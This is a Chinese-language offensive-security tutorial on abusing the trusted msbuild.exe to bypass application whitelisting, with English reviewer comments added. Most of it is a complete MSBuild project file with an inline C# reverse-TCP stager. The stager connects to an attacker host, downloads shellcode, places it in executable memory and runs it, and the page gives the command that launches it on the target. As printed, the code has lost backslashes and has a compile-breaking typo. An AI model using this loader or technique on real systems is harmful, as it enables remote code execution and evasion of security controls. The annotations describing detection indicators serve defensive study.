第七十一課:基于白名單Msbuild.exe執行payload第一季
專注APT攻擊與防御
https://micropoor.blogspot.com/

MSBuild簡介:
MSBuild是 Microsoft Build Engine 的縮寫,代表 Microsoft 和 Visual Studio 的新
的生成平臺。MSBuild 在如何處理和生成軟件方面是完全透明的,使開發人員能夠在未安裝
Visual Studio 的生成實驗室環境中組織和生成產品。
MSBuild 引入了一種新的基于 XML 的項目文件格式,這種格式容易理解、易于擴展并
且完全受 Microsoft 支持。MSBuild 項目文件的格式使開發人員能夠充分描述哪些項需要
生成,以及如何利用不同的平臺和配置生成這些項。

說明:Msbuild.exe所在路徑沒有被系統添加到PATH環境變量中,因此,Msbuild命令無法識
別。

基于白名單MSBuild.exe配置payload:

Windows 7默認位置為:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

攻擊機:192.168.1.4 Debian 靶機: 192.168.1.3 Windows 7

靶機執(zhí)行:
1 C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe Micropoor.xml

配置攻擊機msf:
附錄:Micropoor.xml
注:x86 payload

<!-- Review note: this project contains no build items at all, only one target that
     invokes one inline task. msbuild.exe (a trusted, Microsoft-shipped binary) compiles
     and executes the C# below itself; that is the "whitelist" aspect described above.
     Backslashes in the file paths below were lost in extraction, and the author's
     comment closer uses a non-ASCII dash, so this text is not valid XML as printed. -->
1 <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/develo
per/msbuild/2003">
2 <!‐‐ C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe SimpleT
asks.csproj Micropoor ‐‐>
<!-- The only target: runs the task defined in the UsingTask element below. A project
     whose sole content is a single inline task is itself a usable file-level indicator. -->
3 <Target Name="iJEKHyTEjyCU">
4 <xUokfh />
5 </Target>
<!-- CodeTaskFactory compiles the <Code> element when the target executes (typically by
     spawning csc.exe as a child of msbuild.exe, a process-tree relationship worth alerting
     on outside build servers). -->
6 <UsingTask
7 TaskName="xUokfh"
8 TaskFactory="CodeTaskFactory"
9 AssemblyFile="C:WindowsMicrosoft.NetFrameworkv4.0.30319Microsof
t.Build.Tasks.v4.0.dll" >
10 <Task>
11
12 <Code Type="Class" Language="cs">
13 <![CDATA[
14 using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
// Review note: this is a reverse-TCP stager. As written below it connects to a
// hard-coded host:port, reads a 4-byte length, reads that many bytes, copies them into
// an executable allocation and runs them on a new thread. Only what is on this page is
// described here; the content of the received bytes is not visible here.
15 public class xUokfh : Task, ITask {
// Win32 imports. Pointer-sized values are declared as UInt32, so this only works in a
// 32-bit process (consistent with the "x86 payload" note and the Framework, not
// Framework64, msbuild path). Note: the CreateThread declaration as printed is missing a
// space ("UInt32jyIPELfKQYEVZM") and will not compile verbatim.
16 [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 ogephG,UInt32 fZZrvQ, UInt32 nDfrBaiPvDyeP, UInt32 LWITkrW);
17 [DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 qEVoJxknom, UInt32 gZyJBJWYQsnXkWe, UInt32jyIPELfKQYEVZM,IntPtr adztSLHGJiurGO, UInt32 vjSCprCJ, ref UInt32 KbPukprMQXUp);
18 [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr wVCIQGmqjONiM, UInt32 DFgVrE);
// Connects to ip:port and returns the received bytes behind a 5-byte prefix, or null if
// the connection fails (every exception from Connect is swallowed).
19 static byte[] VYcZlUehuq(string IJBRrBqhigjGAx, int XBUCexXIrGIEpe) {
20 IPEndPoint DRHsPzS = new IPEndPoint(IPAddress.Parse(IJBRrBqhigjGAx),XBUCexXIrGIEpe);
21 Socket zCoDOd = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
22 try { zCoDOd.Connect(DRHsPzS); }
23 catch { return null;}
// The first 4 bytes on the wire are a little-endian length. The Receive return value is
// not checked and the length is not bounds-checked: a negative value throws at the
// allocation below, a huge one allocates that much.
24 byte[] OCrGofbbWRVsFEl = new byte[4];
25 zCoDOd.Receive(OCrGofbbWRVsFEl, 4, 0);
26 int auQJTjyxYw = BitConverter.ToInt32(OCrGofbbWRVsFEl, 0);
27 byte[] MlhacMDOKUAfvMX = new byte[auQJTjyxYw + 5];
28 int GFtbdD = 0;
// Reads the body after the 5-byte prefix in chunks of at most 4096 bytes. A Receive that
// returns 0 (peer closed) leaves the counter unchanged, so the loop then spins forever.
29 while (GFtbdD < auQJTjyxYw)
30 { GFtbdD += zCoDOd.Receive(MlhacMDOKUAfvMX, GFtbdD + 5, (auQJTjyxYw ‐GFtbdD) < 4096 ? (auQJTjyxYw ‐ GFtbdD) : 4096, 0);}
// Prefix = 0xBF followed by the socket handle. On x86, BF imm32 is `mov edi, imm32`, so
// the received code starts with the still-open socket's handle in EDI (the second-stage
// reuse of the same TCP connection is the network-level tell: one long-lived session
// that begins with a length-prefixed binary blob).
31 byte[] YqBRpsmDUT = BitConverter.GetBytes((int)zCoDOd.Handle);
32 Array.Copy(YqBRpsmDUT, 0, MlhacMDOKUAfvMX, 1, 4); MlhacMDOKUAfvMX[0]= 0xBF;
33 return MlhacMDOKUAfvMX;}
// Copies the bytes into a fresh allocation and runs them on a new thread, blocking until
// that thread exits; does nothing when the download returned null.
34 static void NkoqFHncrcX(byte[] qLAvbAtan) {
35 if (qLAvbAtan != null) {
// VirtualAlloc(NULL, len, 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE) followed
// by CreateThread on the same address is the textbook in-memory loader sequence that
// EDR / ETW-based detections key on (RWX allocation from a managed process, thread
// start address outside any loaded image).
36 UInt32 jrYMBRkOAnqTqx = VirtualAlloc(0, (UInt32)qLAvbAtan.Length, 0x1000, 0x40);
37 Marshal.Copy(qLAvbAtan, 0, (IntPtr)(jrYMBRkOAnqTqx),qLAvbAtan.Length);
38 IntPtr WCUZoviZi = IntPtr.Zero;
39 UInt32 JhtJOypMKo = 0;
40 IntPtr UxebOmhhPw = IntPtr.Zero;
41 WCUZoviZi = CreateThread(0, 0, jrYMBRkOAnqTqx, UxebOmhhPw, 0, ref JhtJOypMKo);
// 0xFFFFFFFF = INFINITE: msbuild.exe stays alive for as long as the injected thread
// runs, so a long-running msbuild.exe with an established outbound socket is suspicious.
42 WaitForSingleObject(WCUZoviZi, 0xFFFFFFFF); }}
43
// Entry point MSBuild calls when the task runs. The host is the attacking machine from
// the page (192.168.1.4); TCP/53 carrying a non-DNS stream is an anomaly a network
// sensor can flag. Returning true makes the "build" report success whatever happened.
44 public override bool Execute()
45 {
46 byte[] uABVbNXmhr = null; uABVbNXmhr = VYcZlUehuq("192.168.1.4", 53);
47 NkoqFHncrcX(uABVbNXmhr);
48
49 return true; } }
50 ]]>
51 </Code>
52 </Task>
53 </UsingTask>
54 </Project>

Micropoor
?